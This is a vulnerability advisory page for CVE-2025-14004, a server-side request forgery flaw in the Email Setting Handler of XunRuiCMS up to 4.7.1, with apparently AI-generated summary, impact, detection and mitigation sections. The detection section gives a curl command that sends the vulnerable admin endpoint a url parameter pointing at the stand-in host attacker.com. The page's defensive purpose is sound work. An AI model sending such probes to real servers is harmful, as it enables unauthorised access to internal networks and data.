CVE-2025-14004
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-12-04

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security flaw has been discovered in dayrui XunRuiCMS up to 4.7.1. Affected is an unknown function of the file /admind45f74adbd95.php?c=email&m=add of the component Email Setting Handler. Performing a manipulation results in server-side request forgery. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-12-04
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2025-12-04
EPSS Evaluated
2026-06-15
NVD
CVE-2025-14004
EUVD
EUVD-2025-201162
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
xunruicms xunruicms to 4.7.1 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability is a server-side request forgery (SSRF) flaw in dayrui XunRuiCMS up to version 4.7.1, specifically in the Email Setting Handler component accessed via the file /admind45f74adbd95.php with parameters c=email and m=add. An attacker can manipulate server requests to make the server perform unauthorized requests, potentially accessing internal network resources or exposing sensitive data. The vulnerability can be exploited remotely and the exploit code has been publicly released. [1]

Impact Analysis

The vulnerability can allow an attacker to perform unauthorized requests from the server, potentially leading to unauthorized access to internal network resources, exposure of sensitive data, or further attacks within the network. This can compromise the confidentiality, integrity, and availability of the affected system and its data. [1]

Detection Guidance

Detection of this SSRF vulnerability can be approached by monitoring HTTP requests to the vulnerable endpoint `/admind45f74adbd95.php?c=email&m=add` for unusual or unauthorized parameters that manipulate server requests. Network intrusion detection systems (NIDS) can be configured to alert on requests targeting this URL with suspicious payloads. Additionally, manual testing using curl or similar tools can help verify if the endpoint is vulnerable by sending crafted requests to observe server behavior. Example command: `curl -v 'http://<target>/admind45f74adbd95.php?c=email&m=add&url=http://attacker.com'` to test if the server makes unintended requests. [1]

Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable endpoint to trusted users only, applying input validation and sanitization on parameters to prevent SSRF payloads, and implementing network-level controls such as firewall rules to block unauthorized outbound requests from the server. Since the vendor has not responded, consider disabling or restricting the email setting functionality until a patch or official fix is available. [1]

Compliance Impact

The provided resources do not contain information regarding the impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-14004. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart